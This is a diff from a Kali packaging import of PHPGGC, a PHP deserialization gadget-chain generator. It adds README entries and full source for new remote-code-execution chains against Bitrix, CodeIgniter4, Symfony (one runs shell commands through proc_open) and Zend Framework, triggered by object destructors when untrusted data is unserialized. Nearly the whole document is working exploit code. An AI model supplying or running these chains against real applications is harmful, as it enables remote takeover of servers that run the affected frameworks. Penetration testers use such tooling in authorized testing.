Import upstream version 0.20221103
Kali Janitor
1 year, 5 months ago
20 | 20 | ------------- |
21 | 21 | |
22 | 22 | NAME VERSION TYPE VECTOR I |
23 | Bitrix/RCE1 17.x.x <= 22.0.300 RCE (Function call) __destruct | |
23 | 24 | CakePHP/RCE1 ? <= 3.9.6 RCE (Command) __destruct |
24 | 25 | CakePHP/RCE2 ? <= 4.2.3 RCE (Function call) __destruct |
25 | 26 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct |
84 | 85 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * |
85 | 86 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * |
86 | 87 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * |
87 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
88 | Symfony/RCE5 5.2.* RCE (Function call) __destruct | |
89 | Symfony/RCE6 3.4 RCE (Command) __destruct * | |
88 | 90 | TCPDF/FD1 <= 6.3.5 File delete __destruct * |
89 | 91 | ThinkPHP/FW1 5.0.4-5.0.24 File write __destruct * |
90 | 92 | ThinkPHP/FW2 5.0.0-5.0.03 File write __destruct * |
113 | 115 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * |
114 | 116 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * |
115 | 117 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct |
116 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
118 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
119 | ZendFramework/RCE5 2.0.1 <= ? RCE (Function call) __destruct | |
117 | 120 | ``` |
118 | 121 | |
119 | 122 | Filter gadget chains: |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Bitrix; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '17.x.x <= 22.0.300'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'crlf'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Bitrix\Main\ORM\Data\Result( | |
16 | new \Bitrix\Main\Type\Dictionary( | |
17 | new \Bitrix\Main\Error( | |
18 | new \Bitrix\Main\UI\Viewer\ItemAttributes( | |
19 | new \Bitrix\Main\DB\ResultIterator( | |
20 | new \Bitrix\Main\DB\ArrayResult( | |
21 | $function, $parameter | |
22 | ) | |
23 | ) | |
24 | ) | |
25 | ) | |
26 | ) | |
27 | ); | |
28 | } | |
29 | } |
0 | <?php | |
1 | ||
2 | namespace Bitrix\Main { | |
3 | class Result | |
4 | { | |
5 | protected $errors; | |
6 | ||
7 | public function __construct(object $Dictionary) | |
8 | { | |
9 | $this->errors = $Dictionary; | |
10 | } | |
11 | } | |
12 | ||
13 | class Error { | |
14 | protected $message; | |
15 | ||
16 | public function __construct(object $ItemAttributes) | |
17 | { | |
18 | $this->message = $ItemAttributes; | |
19 | } | |
20 | } | |
21 | } | |
22 | ||
23 | namespace Bitrix\Main\ORM\Data { | |
24 | class Result extends \Bitrix\Main\Result | |
25 | { | |
26 | protected $isSuccess = false; | |
27 | protected $wereErrorsChecked = false; | |
28 | ||
29 | public function __construct(object $Dictionary) | |
30 | { | |
31 | parent::__construct($Dictionary); | |
32 | } | |
33 | } | |
34 | } | |
35 | ||
36 | namespace Bitrix\Main\Type { | |
37 | class Dictionary | |
38 | { | |
39 | protected $values; | |
40 | ||
41 | public function __construct(object $Error) | |
42 | { | |
43 | $this->values = [$Error]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Bitrix\Main\UI\Viewer { | |
49 | class ItemAttributes | |
50 | { | |
51 | protected $attributes; | |
52 | ||
53 | public function __construct(object $ResultIterator) | |
54 | { | |
55 | $this->attributes = $ResultIterator; | |
56 | } | |
57 | } | |
58 | } | |
59 | ||
60 | namespace Bitrix\Main\DB { | |
61 | class ResultIterator | |
62 | { | |
63 | private $counter = 0; | |
64 | private $currentData = 0; | |
65 | private $result; | |
66 | ||
67 | public function __construct(object $ArrayResult) | |
68 | { | |
69 | $this->result = $ArrayResult; | |
70 | } | |
71 | } | |
72 | ||
73 | class ArrayResult | |
74 | { | |
75 | protected $resource; | |
76 | protected $converters; | |
77 | ||
78 | public function __construct(string $function, string $parameter) | |
79 | { | |
80 | $this->converters = [$function, 'WriteFinalMessage']; | |
81 | $this->resource = [[$parameter], [['rce']]]; | |
82 | } | |
83 | } | |
84 | } |
3 | 3 | |
4 | 4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
6 | public static $version = '4.0.2 <= 4.0.3'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers | |
3 | { | |
4 | class RedisHandler | |
5 | { | |
6 | protected $redis; | |
7 | ||
8 | public function __construct($func, $param) | |
9 | { | |
10 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
11 | new \CodeIgniter\Model( | |
12 | new \CodeIgniter\Database\BaseBuilder, | |
13 | new \CodeIgniter\Validation\Validation, | |
14 | $func | |
15 | ), | |
16 | $param | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers | |
23 | { | |
24 | class MemcachedHandler | |
25 | { | |
26 | protected $memcached; | |
27 | protected $lockKey; | |
28 | ||
29 | public function __construct($memcached, $param) | |
30 | { | |
31 | $this->lockKey = $param; | |
32 | $this->memcached = $memcached; | |
33 | } | |
34 | } | |
35 | } | |
36 | ||
37 | namespace CodeIgniter | |
38 | { | |
39 | class Model | |
40 | { | |
41 | protected $builder; | |
42 | protected $primaryKey; | |
43 | protected $beforeDelete; | |
44 | protected $validationRules; | |
45 | protected $validation; | |
46 | ||
47 | public function __construct($builder, $validation, $func) | |
48 | { | |
49 | $this->builder = $builder; | |
50 | $this->primaryKey = null; | |
51 | ||
52 | $this->beforeDelete = array(); | |
53 | $this->beforeDelete[] = "validate"; | |
54 | ||
55 | $this->validation = $validation; | |
56 | $this->validationRules = array( | |
57 | "id" => array($func) | |
58 | ); | |
59 | } | |
60 | } | |
61 | } | |
62 | ||
63 | namespace CodeIgniter\Validation | |
64 | { | |
65 | class Validation | |
66 | { | |
67 | protected $ruleSetFiles; | |
68 | ||
69 | public function __construct() | |
70 | { | |
71 | $this->ruleSetFiles = array("finfo"); | |
72 | } | |
73 | } | |
74 | } | |
75 | ||
76 | namespace CodeIgniter\Database | |
77 | { | |
78 | class BaseBuilder | |
79 | { | |
80 | } | |
81 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Symfony; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = 'v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $command = $parameters['command']; | |
14 | ||
15 | return new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator( | |
16 | $command | |
17 | ); | |
18 | } | |
19 | } |
0 | <?php | |
1 | namespace Symfony\Component\Routing\Loader\Configurator | |
2 | { | |
3 | class ImportConfigurator | |
4 | { | |
5 | private $parent; | |
6 | ||
7 | function __construct($cmd) | |
8 | { | |
9 | $this->parent = new \Symfony\Component\Cache\Traits\RedisProxy($cmd); | |
10 | } | |
11 | } | |
12 | } | |
13 | ||
14 | namespace Symfony\Component\Cache\Traits | |
15 | { | |
16 | class RedisProxy | |
17 | { | |
18 | private $initializer; | |
19 | private $redis; | |
20 | ||
21 | function __construct($cmd) | |
22 | { | |
23 | $this->initializer = new \Symfony\Component\DependencyInjection\Loader\Configurator\InstanceofConfigurator($cmd); | |
24 | $this->redis = $cmd; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Symfony\Component\DependencyInjection\Loader\Configurator | |
30 | { | |
31 | class InstanceofConfigurator | |
32 | { | |
33 | protected $parent; | |
34 | ||
35 | function __construct($cmd) | |
36 | { | |
37 | $this->parent = new \Symfony\Component\Cache\Simple\Psr6Cache($cmd); | |
38 | } | |
39 | ||
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\Cache\Simple | |
44 | { | |
45 | class Psr6Cache | |
46 | { | |
47 | private $pool; | |
48 | ||
49 | function __construct($cmd) | |
50 | { | |
51 | $this->pool = new \Symfony\Component\Cache\Adapter\PhpArrayAdapter($cmd); | |
52 | } | |
53 | ||
54 | } | |
55 | } | |
56 | ||
57 | namespace Symfony\Component\Cache\Adapter | |
58 | { | |
59 | class PhpArrayAdapter | |
60 | { | |
61 | private $values; | |
62 | private $createCacheItem; | |
63 | ||
64 | function __construct($cmd) | |
65 | { | |
66 | $this->values = array($cmd=>[]); | |
67 | $this->createCacheItem = "proc_open"; | |
68 | } | |
69 | } | |
70 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.0.0rc2 <= 2.5.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters["function"]; | |
13 | $parameter = $parameters["parameter"]; | |
14 | ||
15 | return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | namespace Zend\Cache\Storage\Adapter | |
2 | { | |
3 | class Memory | |
4 | { | |
5 | protected $eventHandles; | |
6 | protected $events; | |
7 | ||
8 | function __construct($function, $param) | |
9 | { | |
10 | $this->eventHandles = [1]; | |
11 | $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param); | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Zend\View\Renderer | |
17 | { | |
18 | class PhpRenderer | |
19 | { | |
20 | private $__helpers; | |
21 | ||
22 | function __construct($function, $param) | |
23 | { | |
24 | $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param); | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Zend\Tag\Cloud | |
30 | { | |
31 | class DecoratorPluginManager | |
32 | { | |
33 | protected $canonicalNames; | |
34 | protected $invokableClasses; | |
35 | protected $retrieveFromPeeringManagerFirst; | |
36 | protected $initializers; | |
37 | ||
38 | function __construct($function, $param) | |
39 | { | |
40 | $this->canonicalNames = array("detach"=>"cname","cname"=>"any"); | |
41 | $this->invokableClasses = array("cname"=>"Zend\Tag\Cloud\DecoratorPluginManager");//satisfying the class_exists | |
42 | $this->retrieveFromPeeringManagerFirst = false; | |
43 | $this->initializers = [new \Zend\Filter\FilterChain($function, $param)]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Zend\Filter | |
49 | { | |
50 | class FilterChain | |
51 | { | |
52 | protected $filters; | |
53 | ||
54 | function __construct($function, $param) | |
55 | { | |
56 | $this->filters = new \SplFixedArray(2); | |
57 | $this->filters[0] = array( | |
58 | new \Zend\Json\Expr($param), | |
59 | "__toString" | |
60 | ); | |
61 | $this->filters[1] = $function; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Zend\Json | |
67 | { | |
68 | class Expr | |
69 | { | |
70 | protected $expression; | |
71 | ||
72 | function __construct($param) | |
73 | { | |
74 | $this->expression = $param; | |
75 | } | |
76 | } | |
77 | } |